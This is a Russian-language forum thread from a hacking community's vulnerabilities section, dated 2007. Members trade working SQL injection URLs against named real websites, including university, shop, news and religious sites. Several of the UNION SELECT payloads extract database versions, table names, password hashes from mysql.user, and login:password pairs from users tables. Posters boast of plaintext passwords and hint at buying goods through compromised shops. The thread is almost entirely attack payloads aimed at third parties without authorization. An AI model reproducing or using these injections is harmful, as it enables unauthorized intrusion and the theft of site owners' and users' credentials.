HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.03.2007, 16:56
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию

PHP код:
http://zona.bloudil.cz/index.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9/* 
 
Ответить с цитированием

  #2  
Старый 15.03.2007, 16:38
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию

2 Ksander
там может и нет таблицы юзеров... ведь корзина, судя по всему, кукисы юзает, а не авторизацию.. да и админки я там не видел.
вот аналогичный случай:
Код:
http://www.fightbeat.com/article_detail.php?AT=-1+union+select+1,2,3,4,5,6,7,8/*
 
Ответить с цитированием

  #3  
Старый 15.03.2007, 17:35
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию

Код:
http://www.intellectpro.ru/news/index.php?oper=view&news_id=-1+union+select+1,table_name,3+from+information_schema.tables/*
там 350+-50 таблиц, лично мне просматривать все лень
перебрал 50 шт. и забил)
 
Ответить с цитированием

  #4  
Старый 15.03.2007, 17:58
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию

PHP код:
http://www.selfserviceworld.com/article.php?id=-1+union+select+1,password,3,4,5,6,7,8+from+mysql.user/* 
PHP код:
http://www.antipatriarcat.org/cmcs/titre.php?id=-1+union+select+1,2,3,4,5,6/* 

Последний раз редактировалось Colkru; 15.03.2007 в 18:03..
 
Ответить с цитированием

  #5  
Старый 15.03.2007, 18:35
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.onlife.ru/drink.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
Нашел таблицу с юзверями и админами, а вот имена колонок подобрать не смог:

Код:
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15,16/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+rozvaga_user/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+rozvaga_admin/*
 
Ответить с цитированием

  #6  
Старый 15.03.2007, 18:37
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.chem.uci.edu/employment/display.employment.faculty.php?id=-6+union+select+1,2,password+from+mysql.user/*

http://artsci.wustl.edu/~acsp/faculty.php?action=person&id=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*

http://www.nsu.ru/psych/business/publication.php?id=-75+union+select+1,2,VERSION(),4,5,6/*

http://www.losingtoday.com/tales.php?id=-132+union+select+1,2,3,4,5,6/*

http://www.best-ipoteka.ru/tales.php?id=-132+union+select+1,2,3,4/*
 
Ответить с цитированием

  #7  
Старый 15.03.2007, 19:29
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Аллах акбар!

www.islam.ru

Код:
http://www.islam.ru/shop/index.php?cat=46&good=-1+union+select+1,convert(version(),char),3,4,5+from+users/*
 
Ответить с цитированием

  #8  
Старый 15.03.2007, 19:57
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию

http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(u sername,char(58),passwd),14+from+user+limit+0,1/*

Пассы в чистом виде)
 
Ответить с цитированием

  #9  
Старый 15.03.2007, 19:46
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Кто себе новый комп хочет ?=)

Код:
http://notes.asdplus.ru/shop/showbrand.php?brand=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,log,18,19,20+from+users+limit+6,1/*

Тут прикупить книжки и диски для компа =)

Код:
http://www.saranagati.net/shop/index.php?p=list&cid=-1+union+select+concat(login,char(58),password)+from+users/*


p.s.у меня чето все скули по темам идут =)

Последний раз редактировалось Ksander; 15.03.2007 в 19:50..
 
Ответить с цитированием

  #10  
Старый 15.03.2007, 20:46
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Чтобы как то компенсировать казус с мейлом вот:

http://hotel.travel.rambler.ru

Правда там mssql

Код:
http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1
так чтоли ?

Код:
http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1+union+all+select+1 bla bla bla---
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.